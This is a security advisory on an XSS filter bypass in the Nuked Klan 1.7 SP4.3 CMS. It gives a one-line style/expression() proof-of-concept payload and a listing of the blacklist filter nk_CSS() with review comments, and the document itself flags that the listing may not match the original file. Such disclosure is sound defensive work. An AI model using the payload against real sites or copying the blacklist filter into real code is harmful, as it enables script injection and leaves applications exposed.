Nuked Klan 1.7 SP4.3: anti-XSS filter function nk_CSS() bypass
// *- BEGIN -*
// By Blwood
// http://blwood.net
The anti-XSS filter nk_CSS() (defined in nuked.php) can be bypassed with a payload such as the one below. The function is a substring blacklist (script, eval, on* event handlers, href, src, ...) and never looks at the style attribute or at the CSS expression() construct, so nothing in the payload matches any of its patterns:
<b id="blwood" style="width:expression(alert('http://www.blwood.net'))"></b>

(CSS expression() is a legacy Internet Explorer feature and is not evaluated by modern browsers, but the defect is in the filter itself: a fixed list of forbidden substrings cannot cover every way markup can carry script.)
Here is the function as shipped in nuked.php. Note that, as reproduced below, every replacement string is identical to the pattern it replaces; the entity-encoded replacement forms may have been lost in copying, so check the original file before relying on this listing:
// Blacklist-based "anti-XSS" filter applied to user-supplied text/HTML.
// It case-insensitively rewrites a fixed list of substrings (MIME header names,
// PHP open/close tags, "script", "eval", on* event handlers, "href", "src", ...)
// and returns the result. It does not escape, parse or validate the markup.
//
// NOTE(review): as reproduced here every replacement string equals its search
// pattern, so the only observable effect is case-normalising matched tokens
// (e.g. "onClick" -> "onclick"); the encoded replacement forms were probably
// lost in copying -- verify against nuked.php.
// NOTE(review): neither "style" nor "expression" is in the list, so the payload
// at the top of this advisory (style="width:expression(...)") passes through
// untouched. That is the reported bypass.
// NOTE(review): eregi_replace() is part of the POSIX ereg family, deprecated
// since PHP 5.3 and removed in PHP 7; on a current interpreter this function
// aborts with an undefined-function error instead of filtering anything.
// NOTE(review): matching is on raw substrings with no decoding beforehand, so
// ordinary words containing a token are rewritten too ("description" contains
// "script", "documentation" contains "document"), while encoded variants are not
// normalised before the comparison. A substring blacklist cannot be made
// complete; the robust fix is context-specific escaping (htmlspecialchars with
// ENT_QUOTES) or an allowlist HTML sanitiser, not a longer list.
//
// @param  string $str  untrusted text/HTML to filter
// @return string       $str with every listed token rewritten, case-insensitively
function nk_CSS($str)
{
// Empty input is returned unchanged.
if ($str != "")
{
// MIME header names (mail/upload injection tokens).
$str =
eregi_replace("content-disposition:","content-disposition:",$str);
$str =
eregi_replace("content-type:","content-type:",$str);
$str =
eregi_replace("content-transfer-encoding:","content-transfer-encoding:",$str);
// PHP keywords and tags. The double-quoted "\<\?" / "\?\>" literals keep the
// backslashes (PHP leaves unknown escapes as-is), so the backslashes reach the
// ereg engine as part of the pattern.
$str =
eregi_replace("include","include",$str);
$str = eregi_replace("\<\?","<?",$str);
$str = eregi_replace("<\?php","<?php",$str);
$str = eregi_replace("\?\>","?>",$str);
// Script-related tag and keyword names.
$str =
eregi_replace("script","script",$str);
$str = eregi_replace("eval","eval",$str);
$str =
eregi_replace("javascript","javascript",$str);
$str = eregi_replace("embed","embed",$str);
$str =
eregi_replace("iframe","iframe",$str);
$str = eregi_replace("refresh",
"refresh", $str);
// Inline event-handler attribute names. The list is fixed; any handler not
// named here, and the style attribute used by the advisory's payload, is
// passed through.
$str = eregi_replace("onload", "onload",
$str);
$str = eregi_replace("onstart",
"onstart", $str);
$str = eregi_replace("onerror",
"onerror", $str);
$str = eregi_replace("onabort",
"onabort", $str);
$str = eregi_replace("onblur", "onblur",
$str);
$str = eregi_replace("onchange",
"onchange", $str);
$str = eregi_replace("onclick",
"onclick", $str);
$str = eregi_replace("ondblclick",
"ondblclick", $str);
$str = eregi_replace("onfocus",
"onfocus", $str);
$str = eregi_replace("onkeydown",
"onkeydown", $str);
$str = eregi_replace("onkeypress",
"onkeypress", $str);
$str = eregi_replace("onkeyup",
"onkeyup", $str);
$str = eregi_replace("onmousedown",
"onmousedown", $str);
$str = eregi_replace("onmousemove",
"onmousemove", $str);
$str = eregi_replace("onmouseover",
"onmouseover", $str);
$str = eregi_replace("onmouseout",
"onmouseout", $str);
$str = eregi_replace("onmouseup",
"onmouseup", $str);
$str = eregi_replace("onreset",
"onreset", $str);
$str = eregi_replace("onselect",
"onselect", $str);
$str = eregi_replace("onsubmit",
"onsubmit", $str);
$str = eregi_replace("onunload",
"onunload", $str);
// DOM / scripting-language identifiers and attribute names.
$str = eregi_replace("document",
"document", $str);
$str = eregi_replace("cookie", "cookie",
$str);
$str = eregi_replace("vbscript",
"vbscript", $str);
$str = eregi_replace("location",
"location", $str);
$str = eregi_replace("object", "object",
$str);
$str = eregi_replace("vbs", "vbs", $str);
$str = eregi_replace("href", "href", $str);
$str = eregi_replace("src", "src", $str);
}
return($str);
}
// *- END -*